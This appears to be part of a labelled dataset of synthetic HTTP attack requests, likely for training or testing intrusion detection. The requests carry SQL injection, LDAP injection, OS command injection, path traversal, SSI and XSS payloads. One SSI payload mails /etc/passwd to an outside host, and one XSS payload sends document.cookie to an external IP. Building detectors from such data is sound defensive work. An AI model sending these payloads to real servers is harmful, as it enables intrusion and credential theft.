UA-Disp: 2948,912,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 353x220
Via: 5.2 www.sunaa.js
Transfer-Encoding: identity
Upgrade: rano1/8.6
Warning: 378 www.ecns.png "easteTT0eewfrbeti3jm" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 2668554721639
----: ---------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49231
Start - Id: 41296
class: SqlInjection
GET /b1TTqSAY-8aXYpmRO8.cfm?ar6tu=jtjd%3C%2F+0&h2enneAd3nimse=59962&JXjh5Yrgsreplace=lsd+e&o0aRM@4uM.8=tteCI&yMchildx=74319988&rg8update=0310573&rtIfsa=kehavingto%25&eo1Tpmyosw=83070&n6=4127&WJ3d-g0=hTdm&QitxtjO=trero HTTP/1.0
Host: www.6cxdabilrd.de:11451
Connection: keep-alive
Accept: text/*
Accept-Charset: euc-tw, utf-8, iso-8859-2;q=0.7, iso-8859-2;q=0.3
Accept-Encoding: compress, gzip, compress;q=0.1, identity
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 67.26.191.197
Cookie: ttvvcs=0953;nmitho=9d);ta='  OR     'e42n'    =  '  
Cookie2: $Version="012"
Date: Mon, 01 Jun 09 19:57:13 UTC
ETag: "JhjNr2i1GthRTBS"
Expect: eiE7lece=iaq5e;ais3gwt=reznwiro
From: 7jtnsEc@oHtbtu9a.biz
If-Modified-Since: Sun, 15 May 05 21:05:45 GMT
If-Unmodified-Since: Wed, 25 May 05 17:08:00 CET
If-Match: *
If-None-Match: "eLkKc13imukkxoG"
If-Range: Sat, 21 May 05 14:53:52 UTC
Max-Forwards: 097
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=bonEh
Range: 1-,9-8
Referer: http://s0nSnljd.net/taltrsbi/po0cuo/akds/jHepes/dihj8er.png
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/7.7 (compatible; Konqueror/0.6; Win98; eonree8tar; 8vrtaian)
UA-CPU: MIPS
UA-Disp: 8902,8291,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5435x782
Via: 1.9 www.eyib.js:36
Transfer-Encoding: deflate
Upgrade: e1em/3.9, othbu/3.3, yin/5.4, shfedi/0.7
Warning: 350 www.Sdw54r.shtml "dtdtp7mtttrwP" 
X-Forwarded-For: 0.5.238.60
X-Serial-Number: 99307036492325759306
----: ------------------------

null

End - Id: 41296
Start - Id: 43006
class: OsCommanding
PUT /4Qk/atpeee/DxmC/gth/oNu/Jo1/efqvarY97n/eNVIg0W92_lm1RzK/s2aseeoptIr/zh0t..gif? HTTP/1.1
Content-Length: 30
Content-Language: Nce1ei,yr
Content-Encoding: identity
Content-Location: http://www.fkHtcrs.cz/eiiose6/otisr01e.msf
Content-MD5: dndFbENlbGJ1YXJ0bXNlcA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 May 05 24:35:16 CET
Last-Modified: Wed, 16 May 07 11:24:09 GMT
Host: www.eilOa.org:80
Connection: close
Accept: */*
Accept-Charset: macintosh;q=0.5, koi8;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: deoteeT-innaoibt;q=0.5, lh-amrod;q=0.7, aru-Ill, luooEdu-stah;q=0.4
Cache-Control: no-store
Client-ip: 110.134.30.79
Cookie: I2P.aT3=0135233;me=ltlRiv
Cookie2: $Version="63"
Date: Fri, 03 Apr 09 20:44:19 CET
ETag: W/"0NBLX.RBY-fBb-s"
Expect: 100-continue
From: nerhOvTl@7taord7ae.gov
If-Modified-Since: Wed, 15 Dec 04 11:44:17 CET
If-Unmodified-Since: Mon, 29 Aug 05 21:03:53 GMT
If-Match: "iz69ZTYIHRGVfeWaYak_"
If-None-Match: *
If-Range: Wed, 11 Jan 06 01:45:27 UTC
Max-Forwards: 1164
Pragma: I=e9
Authorization: NTLM cm5uZGVhcnhiYnJsaHRUdEVoYWloc2VuYW9uYXFoMnM=
Referer: http://www.osheb.be/vvtknI/ak0tAta/7ebl2/wj8nleiu/m1n4sa.pdf
TE: deflate,deflate;q=0.1,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.8 (compatible; Konqueror/2.0; Open BSD i386; rulahl)
UA-Pixels: 2695x320
Via: 4.5 246.6.12.40:3130, FTP/6.4 55.45.174.120, FTP/0.5 www.o8nos.jpeg
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: e5edij/1.7, tveoee/4.3
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: -----------------------

wKCI=cat   /etc/passwd |

End - Id: 43006
Start - Id: 40187
class: SSI
GET /zHOIkCtF8G/eyyrHhWD_Yd9AM/l_89Cc7og/iAau_6/mxifeteB5nlwHpeye/uSN7.html?anrpn=9&kes4mfn=rlN18FZ&qpkdsiatlleacu=03&sssl=5163686&union8v-Er3rcp=9347387116&wcdoap67=4orwt5rw4&etsegIswzh=a&E3MOZMW=6aqaen7tooYlmRisP&nrsReESznerm=30016&rUoelaec5oae=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fmail+ocrmlis.com++%3C+++%2Fetc%2Fpasswd%22--%3E&tDtyReeiAchca=3meo&AAuKK1fC=evr+3hkr HTTP/1.1
Host: www.npri5a.it
Connection: close
Accept: video/quicktime;q=0.3
Accept-Charset: x-mac-hebrew;q=0.3, x-mac-japanese, utf-8;q=0.6
Accept-Encoding: 
Accept-Language: aNqeGese-sauheci;q=0.5, n-emprkPte
Cache-Control: max-age=9819
Client-ip: 58.239.184.20
Cookie: snruIqahroiarte=neci 2;i3eeneinaxtE=nf-netcatah;ehsena=ot/e:~[ ;ipsxhnEc=passthrueTeTehoegk-;bsnZoiaeL0=dedn2syd9etnn7u;hlAshxead=3183328
Cookie2: $Version="6"
Date: Sun, 26 Jun 05 07:01:04 UTC
ETag: "pzi6hFuwkT..urvj4k"
Expect: 100-continue
From: edhiue@uzct.com
If-Modified-Since: Sun, 14 Mar 04 05:15:25 GMT
If-Unmodified-Since: Sat, 28 Nov 09 10:15:09 CET
If-Match: "qe4FWAXulTlPYjM-TSx9"
If-None-Match: *
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 295
Pragma: olvnts2r='2t1n3aos'
Proxy-Authorization: Digest username="UloTorac"
Authorization: 2izi oEesqes0=Ina6nc
Range: 95170-36663
Referer: /oprGoeja/oibciqa/tyilqed/tfrvt/tliiiRt.tar.gz
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: Mozilla/4.6 (Machintosh; U; PPC Mac OS X 1.9; 7t-lh; rv:3.1.2) Gecko/63251055
UA-CPU: 68000
UA-Disp: 0932,7706,16
UA-OS: FreeBSD
UA-Pixels: 9646x716
Via: swee/3.6 www.jsse8.css:3117, 7.7 www.urde.shtml
Transfer-Encoding: qaho; hite=aeelL
Upgrade: aiaEi/3.2, nenl/7.3
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40187
Start - Id: 38957
class: LdapInjection
GET /qnchs2llwjae.jpeg?Qboot.ini-7KF93ho=412%29%28%26%28objectClass%3D3ia%29%28%7C%28sn+%3D++soa%29%28cn%3Ds+++J*%29%29&Ooscom6ln=ueDnNtoyAa&py8tjeodl=2133&pxun=956&8FWGperlzqpimg2F=2292&arw=hbg HTTP/1.0
Host: 226.101.13.235
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: 10p-a9lt50a;q=0.4
Cache-Control: only-if-cached
Client-ip: 69.146.201.136
Cookie: IKuqxsystem=rVtTZO
Cookie2: $Version="965"
Date: Fri, 06 May 05 18:17:07 GMT
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 15 May 06 21:03:14 GMT
If-Unmodified-Since: Sat, 04 Nov 06 15:16:08 UTC
If-Match: *
If-None-Match: "9dX3hx96dfOrEM-zEyC"
If-Range: Tue, 17 May 05 10:14:43 UTC
Max-Forwards: 2008
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Digest opaque="Ehnf"
Range: 678-706492,70758-,6439-
Referer: /UaKliGn/istxQSt/geoci/lXobrt7y/taSiuh.html
TE: deflate;q=0.2
Trailer: If-Match
User-Agent: 3segaFVxtnw7oH
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: FTP/0.3 www.dn70eu.htm, HTTP/9.8 www.eaesn.gif, FTP/2.7 www.ttne.js
Transfer-Encoding: deflate
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38957
Start - Id: 44123
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 13.183.74.25
Connection: keep-alive
Accept: */*
Accept-Charset: koi8, iso-8859-8;q=0.0, windows-1254, x-mac-arabic;q=0.7, iso-8859-1
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=962
Client-ip: 207.50.16.19
Cookie: YTCdivC=%e;IuXe=and
Cookie2: $Version="066"
Date: Tue, 27 Dec 05 17:43:49 UTC
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Thu, 27 Apr 06 12:55:33 CET
If-Unmodified-Since: Mon, 28 Feb 05 04:18:59 CET
If-Match: "ZVJ_DF5yd1hfEvLZHvS_"
If-None-Match: "v9taLmA2KHvsnCWYhh7H"
If-Range: Sat, 11 Apr 09 13:22:06 GMT
Max-Forwards: 46
MIME-Version: 3.4
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM a2Rvb2xtZ2h1aWFqcnNiZGVwaGVwdHNlcHRFN2xzdHNsNUU=
Range: 2856-325921,765830-7785,3752-597
Referer: /qisgycp/epimnui/rsntmsi.jpeg
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.9 (compatible; Konqueror/2.8; Linux i586; dval)
UA-CPU: 68000
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 5.0 www.ilstple.js, HTTP/0.7 www.laOpecR.html
Transfer-Encoding: deflate
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44123
Start - Id: 42031
class: SqlInjection
GET /eusLil/1XXEA2t5zGIXx/t5aDsu_sWXToV76h/wxhTenEtanpaankxux/ghvisktceasetna.mdb?iacrEs5=4399&9saat=ae%24&h8eQ0=%28Nacmdmocha&uI=rem2marZrg&eutL=%27%3B+drop++table+admin&d9HfhX0lKMq=is%22+%25eprocessing-instructiono5%22N9l0kWsb%3B&se4iehh=is+xtermae6fqe%40kohVi3+i&tbilie=i405nnswrheiu&@Dimgor0L9yMNh=7&aaannh=2pe3dolhsctazt&nf92LAo6hde=enS2fnOeiietslaih HTTP/1.0
Host: 99.61.49.12
Connection: keep-alive
Accept: video/*, image/*;q=0.2
Accept-Charset: gb2312
Accept-Encoding: 
Accept-Language: hntNYpth-qs;q=0.2, 4ptetb4d-N7, t9o-nSoee1;q=0.7, j-minqnroo;q=0.5
Cache-Control: only-if-cached
Client-ip: 144.52.64.113
Cookie: VESOaBBvfJg=rS.0KXr;RFITvgahYMBZ=~g9tr A
Cookie2: $Version="324"
Date: Sun, 24 Feb 08 22:23:21 UTC
ETag: "dwMlCadgRWtK@K1F_"
Expect: 100-continue
From: eliqs@octere.st
If-Modified-Since: Sat, 28 Nov 09 09:35:59 GMT
If-Unmodified-Since: Wed, 02 Apr 08 14:05:18 UTC
If-Match: "tR8UoVNoHQq9bmh0C6sJ"
If-None-Match: *
If-Range: Thu, 26 Feb 04 22:41:06 UTC
Max-Forwards: 336
MIME-Version: 2.5
Pragma: cdoq='ulz90eh'
Proxy-Authorization: Basic ZWdvZTpuaGY0aG4=
Authorization: cces otcyhxtr=dmut
Range: 4936-0,-6636
Referer: /1zbeb/0skrl/bfnei/nnupab/ejeno.cfm
TE: trailers
Trailer: Date
User-Agent: Mozilla/4.3 (X11; U; Open BSD i586 2.4; c4-ah; rv:9.6.5) Gecko/96286795
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: 0.1 www.7ue5oeR.jpeg
Transfer-Encoding: deflate
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 27908
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42031
Start - Id: 42690
class: SqlInjection
PUT /fnnietfaeyhtdzapT.jpeg? HTTP/1.0
Content-Length: 172
Content-Language: M
Content-Encoding: deflate
Content-Location: /or52fmle/E7ee498.png
Content-MD5: OE9vOGFub1RvY21hZmhodA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Dec 08 03:58:38 UTC
Last-Modified: Tue, 06 Nov 07 03:40:48 GMT
Host: www.suAiptweo.uk:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 75.252.239.194
Cookie: afxzy=je+tt%3E%3AGat%27%24%7Cf+so;Twindow.openHLftZnY%u.=ijbZS6q;haosaoTh7sT=mafogtoslq;varnaoioas=86790621;7hihmhdA1=31233;cra=4agyy7meeAzfEm4n
Cookie2: $Version="319"
Date: Thu, 24 Jan 08 14:09:38 UTC
ETag: "MEUWDIHzae01-EC"
Expect: 2rerajnn=llDcy0Nh
From: ntoittcr@aetm8itm.uk
If-Modified-Since: Mon, 29 May 06 16:01:08 CET
If-Unmodified-Since: Tue, 27 Dec 05 21:10:05 UTC
If-None-Match: *
If-Range: "z2itNxIxmdYsJsIL"
Max-Forwards: 0773
MIME-Version: 2.4
Pragma: ea8swsrh=7ih0
Proxy-Authorization: NTLM NGFyNHRxbjRlc3RlNGFvcjRlOW9ybGxodHdlZ2lkOGhnaGk=
Authorization: NTLM bmJTbk9pZWF5Z3Rlc2FlbnJla2lvbDFybDVhdHRmaTBZZW44aWZuaG9JZTdl
Range: 192-,-15804
Referer: http://www.mdberc.com/qb4tB/ailusEo/olbtt.msf
TE: chunked,trailers,trailers
User-Agent: %27++++UNION++++ALL++++++SELECT++++6vadOoosi++FROM+xD+++++WHERE++%27%27+++%3D+%27
UA-Disp: 662,3518,32
UA-Color: color16
Via: HTTP/3.5 222.117.162.130, HTTP/4.5 115.176.29.208
Transfer-Encoding: identity
Upgrade: di2/3.5, 6tBsi/4.2
Warning: 766 www.raittgp6.gif "naie" 
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lrElett=n6hhpassthru5i&slnfi5aee=ar@tmp0yo$tpai1&hbj=8o&oRAaYbVP@LrT=s&eaet0=998590&es=er_.j5eh&LQSqcvX_=gh&Cbz0F6=nmKn&ebixRs1t=ozcq~XSrmp1duae&nl0skuxytzddnnl=60641

End - Id: 42690
Start - Id: 46423
class: PathTransversal
GET /pV_qtqhMHVm4qtsbS/s2eonzihkitdspnCna/orZr6tdtsee/rhit0ti4gmtgeont.png?mEhfnn=eE0rm&No=07767&Entfr=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&arl=h+%2F&fcnt9r=aeNicftlie&E1an=g_E6Jyi&etLkletsa7lnE=554970&ito75=9195&rr5c0rmrHonlios=6804 HTTP/1.0
Host: 219.218.210.131
Connection: aatPvape
Accept: audio/basic;q=0.3, text/xml;q=0.9
Accept-Charset: windows-874
Accept-Encoding: *;q=0.3
Accept-Language: 8dH-eg, sowald9t-el, nlir1jSl-osci2
Cache-Control: no-store
Client-ip: 46.225.127.162
Cookie: uy=r2vIA;frdth=em;yLVbmmail07=6;c5bzb@httpo7=wdtfIAswonrdsdnace;7hdnsm=je0;@NconnectExBF=KooiaLh
Cookie2: $Version="843"
Date: Fri, 19 Mar 10 18:51:35 UTC
ETag: "IY66ek_V0ngLo.jtW5A"
Expect: 100-continue
If-Modified-Since: Sat, 08 Apr 06 17:45:11 GMT
If-Unmodified-Since: Tue, 09 Nov 04 14:16:21 GMT
If-Match: "7KS@DlwmcXx@arGlvAuv"
If-None-Match: *
If-Range: "oY.MRtACTt1v6CSmHV"
Max-Forwards: 2
MIME-Version: 3.3
Pragma: pes='Jgt1rt'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZW1laWhUYnNzRTJmZXB3c250aWV3c3NleXd6a2JwOHN3OW9ncw==
Range: 3341-,1-,7-
Referer: http://www.u7beCld6.fr/meanH/mtnenbc/liE2oet/kqeeg.jsp
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 5.8; m9-Eb; rv:7.3.8) Gecko/55153572
UA-CPU: x86
UA-OS: FreeBSD
Via: 8.9 172.201.127.252, HTTP/7.0 www.hpeas2.tiff, HTTP/4.4 220.13.161.171:94352
Transfer-Encoding: identity
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 223 232.197.120.51 "npays3" "Wed, 14 Jun 06 02:27:53 UTC"
X-Forwarded-For: 242.103.195.112
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46423
Start - Id: 45522
class: PathTransversal
GET /bXhC/6tc8aFtpCt.-9xI1_e/nNYjGOiMia/rvhean8caNr/3Eua9isOtdI3b/sYD/HnTmR5EDmH12y/niht7eo/tszpQqf5E_/rco3FaliHoteooi.cgi?8tj=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&esmaacsac1ats=Haca&tiyIeqe=821339&kiehrecrbwets=oWOs6jJF&ok=liv5&gqbaw5Oeaisw=tstdins%3DdTlxmlb&TpIvars=9aVSATG&ieya=12&yceseOnj=ru7&eercasr=783847 HTTP/1.1
Host: www.si3eoysa.gov
Connection: close
Accept: video/quicktime, image/*;q=0.5
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.7
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 4.76.203.248
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="953"
Date: Sat, 23 Jun 07 07:01:40 UTC
ETag: W/"JCTn_ojKBCwZqY_Co"
Expect: ngo6Mwsy
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Mon, 12 Sep 05 23:21:41 UTC
If-Unmodified-Since: Mon, 01 Jun 09 09:15:42 GMT
If-Match: *
If-None-Match: *
If-Range: "kyyMREN6EzQuSys"
Max-Forwards: 2
MIME-Version: 5.3
Pragma: vsma='b7ie'
Proxy-Authorization: NTLM bm41ZTRwbnFya2lxbnJ0aGR0RXQwZTVpc05zNGR0ZXJ5cnBvY2ZkZnNu
Authorization: NTLM cFNyaGxyRWVobWlpbm9pcWlyY3VvYWVMamg4cmVJZFNlbkJsb2l0d3JlcjR6ZW0=
Range: 55569-482846
Referer: /eeaSf/tprd/veNwirp/bll6e7/t8Es0c.tar.gz
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/9.1 (Windows; U; Win 9x 9.3; r7-xo; rv:1.6.5) Gecko/65083164
UA-CPU: 68000
UA-Disp: 1189,6667,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: Rengoa/6.8 www.SEtegt.gif, 7.6 www.ieaaDi.css, HTTP/6.2 77.82.62.233
Transfer-Encoding: compress
Upgrade: h9ve/7.6, nhnh/8.9, ajSeht/4.1, arunr/6.8, hoib/8.4
Warning: 262 www.yptv0dez.html "oibr8oPRotpdsee8a7ax" "Fri, 17 Aug 07 06:53:24 UTC"
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45522
Start - Id: 45396
class: PathTransversal
PUT /ogFhmpCoAml/cmdconnecteXgbgsoundscript/i04Bbn0Qu8cWCU7/hI3/fYtRnhEdInnrrrriAdTr/FsQjkxkaZLF7w/HOrtueO9/oXti-O4vkNk.swf? HTTP/1.1
Content-Length: 179
Content-Language: nhes,cnaef,sieee
Content-Encoding: identity
Content-Location: http://hciRido.uk/egwp9bs.swf
Content-MD5: VGFtbG9vMHNqeW4xcm1kbA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Sep 09 23:37:40 UTC
Last-Modified: Wed, 02 Jul 08 13:04:00 UTC
Host: 113.217.145.126
Connection: keep-alive
Accept: application/*, audio/*;q=0.1
Accept-Charset: x-mac-icelandic, iso-8859-1, x-mac-roman;q=0.3
Accept-Encoding: 
Accept-Language: k-wcsh, sGdsa1o-3qs;q=0.5, hndotrs-atoG;q=0.4
Cache-Control: only-if-cached
Client-ip: 2.231.241.65
Cookie: ielhb2smaem3re6=utJmjseNaw;idscf=aBCWybpX
Cookie2: $Version="7"
Date: Tue, 24 Nov 09 07:55:49 GMT
ETag: W/"reqAMqHfAzn77w6eGvyA"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sun, 19 Dec 04 08:01:02 CET
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "GKXBoC_Xn9oRrvif6wnT"
If-None-Match: *
If-Range: Tue, 25 Apr 06 20:47:21 UTC
Max-Forwards: 21
MIME-Version: 1.9
Pragma: 3ttseau='ierl'
Proxy-Authorization: qei4S 0e1e=mede
Authorization: NTLM c2JrMmhlZ0NwdXNoZGJBaE5scnNhaXNudHNldGl5c2QwbQ==
Range: -0363
Referer: http://srnih.uk/fehn5u/cerpn/ires/o9ma.tiff
TE: trailers,deflate,deflate;q=0.5
Trailer: Transfer-Encoding
User-Agent: SsSEtnEvs
UA-CPU: StrongARM
UA-Disp: 088,174,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 789x027
Via: 5.5 174.239.41.183
Transfer-Encoding: epWl
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 734 www.Ibioal.css "rqcaasnnairnvta5it" "Mon, 07 Jun 04 08:13:32 UTC"
X-Forwarded-For: 32.85.66.113
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ixi=..\..\..\..\WINNT\system.ini&dlnmcAtten=Frsystemu6c&oStcx6=072&eHadieao=stwkojes&taeltt9dRnhr=2A gj)trlsoot&CGorr6z-=4694&Rnnmen=chWncaopen3&mRrRn=(ek0crayoxo1aj

End - Id: 45396
Start - Id: 47297
class: XSS
GET /neaPdnil/tjqvsSn2mD3mM/lk8ZeOFKDCiB.shtml?Y4hrs=en&Je0=aiya9+whomeSescyedtTrsk&9rhkoe7oo=ejdtnt3Ko&htccpiLSooa0=%3Cimg+++src%3D+++%22++javascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F189.202.234.206%2Flemeta.exe%27%2Bdocument.cookie%29%3B%5D+++%22+%3E&sTfittnd=vw%2B&hseFn=36155&pi=d80E2E4nFUq_ HTTP/1.1
Host: 3.21.105.18
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: c2Rwioid-a, eLac-ishtea, iy7o-o8oineti;q=0.1
Cache-Control: min-fresh=05
Client-ip: 59.59.14.219
Cookie: tSeNohsa7=5e6tMa~uvyamc ;ecIirFygr=Fwindow.openrfnnwp-e-&v $2esbgsound9open;ulqmTeshjnlesu=40405630;shutdowntW@xtermFmTp=teslog;owd3ehnftn=4481
Cookie2: $Version="1"
Date: Sat, 09 Dec 06 04:52:25 UTC
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: oTTAtodr=ae13
From: etiosA@ol5yehtiwE.org
If-Modified-Since: Wed, 12 Dec 07 13:55:35 GMT
If-Unmodified-Since: Thu, 13 Mar 08 16:58:42 GMT
If-Match: "k1PfBSPcT4NXl0_Tw7"
If-None-Match: "0F091VtTg8z.g_oXt"
If-Range: Fri, 11 Mar 05 15:25:06 UTC
Max-Forwards: 059
MIME-Version: 1.9
Pragma: lrs9et=yr0Ioh
Proxy-Authorization: Digest realm
Authorization: jisdwr reuzro=cttadT
Range: -4,7256-5,39-5314
Referer: http://Fghhyrd8.net/LnH4dg/ttL1/agnRso/nilrwm7/ukrnnt.ace
TE: trailers,trailers,deflate;q=0.9
Trailer: User-Agent
User-Agent: nYp5v66HKK http://www.tmitta2.ch
UA-CPU: Sparc
UA-Disp: 7412,103,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: HTTP/6.0 137.66.67.14, 9.8 www.vmOr.gif
Transfer-Encoding: fidgsl; eoardf=8nny
Upgrade: 8iiKe/2.0, iiEe/4.6, ywedbe/9.1, aapo/1.4, Pjtu/9.8
Warning: 299 www.leto.html "eaiemdnssbtcpoo5ntb" "Fri, 25 Aug 06 10:41:44 GMT"
X-Forwarded-For: 7.96.3.255
X-Serial-Number: 1360027
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47297
Start - Id: 38885
class: LdapInjection
GET /pocRwmxceEeIett5un1/QAeX7/Qo2thoHfzboihhn4te7o/hkJmOjyGov_MQvJq/lvonei/ohthrIgvrdeSe3oTe8b4.php4?riao=2u%29%28+%7C+++%28n4lov%3D*%29&iMvebetmrlbo4sn=e4%3E&EcsjjtxErews=68943789&isarsmcc=a-_UxtBo8u-v&ab0rNriEneeoW=yYC1lAC%40&x2=94216&GOnstodhdus=275372&f2ojbohevrertt=85014 HTTP/1.1
Host: 88.63.65.199
Connection: close
Accept: video/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nho9t-De;q=0.2, iupeyB-smoo, eiag-nina
Cache-Control: xaiely=r
Client-ip: 191.208.34.138
Cookie: Yeferunltms=5683260627;-dHajFk9a=seerhtpassr8OOic1a o;emhwfosa4tSs=o-i;hlUn4=1987912;_Weid0zvKN=goSo|nb1oee;aetyt0efh9os=zcA
Cookie2: $Version="1"
Date: Tue, 21 Mar 06 20:58:53 GMT
ETag: W/"GQYvF59TeQfbrP-gc"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sat, 05 May 07 11:25:13 CET
If-Unmodified-Since: Sat, 30 Oct 04 20:09:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8268
MIME-Version: 2.4
Pragma: avqey=srneu
Proxy-Authorization: NTLM MnQzaW9iYWF0aHNsUnRjYzBudGlpa0FvVWVjZWE3ZWlwNGVsaHNpYWZpc3BoZWE=
Authorization: Digest nonce
Range: 15934-,799-8058,-81465
Referer: http://Nraed.uk/eshe2/a3rg/xonteto.jpg
TE: chunked;q=0.9
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.6 (Windows; U; Win98 2.2; wl-Tt; rv:9.6.4) Gecko/58228332
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 5.4 www.afeah.tiff:05, FTP/8.6 www.enHl6cv.gif:90782
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: p9rld/0.9, tneW2/8.4
Warning: 654 173.160.4.85 "Ioao" 
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38885
Start - Id: 43262
class: OsCommanding
GET /sTMd5YdAn/eerSt61onwQfl/8E0Inl2in6eh/ch/snhomlOlt6Y/rqetn/x3s4.cgi?5tsvos=6749&eT4nalrsgog=8901&TMscriptk=lutneaaWodthr&erasswmGzgu4nI=+sntgwp-ovv&p0akxFrlyou=orlimrSw1i&NofmnTsksdPtne=%7C%2520%2Fbin%2Fid%26&aoDi=thxBJiV9l%40&m03E=92974758&iu=lOy HTTP/1.0
Host: 225.151.149.109
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=554
Client-ip: 116.247.114.110
Cookie: fN2tJ0oupdateYwh-=q;epxhSp7qrw7=adminc9n+t;k8NU21YHmFKwhere=1627
Cookie2: $Version="54"
Date: Thu, 08 Dec 05 01:08:50 CET
ETag: "PEioMFbnQm-_spjg_"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Thu, 30 Apr 09 08:04:16 CET
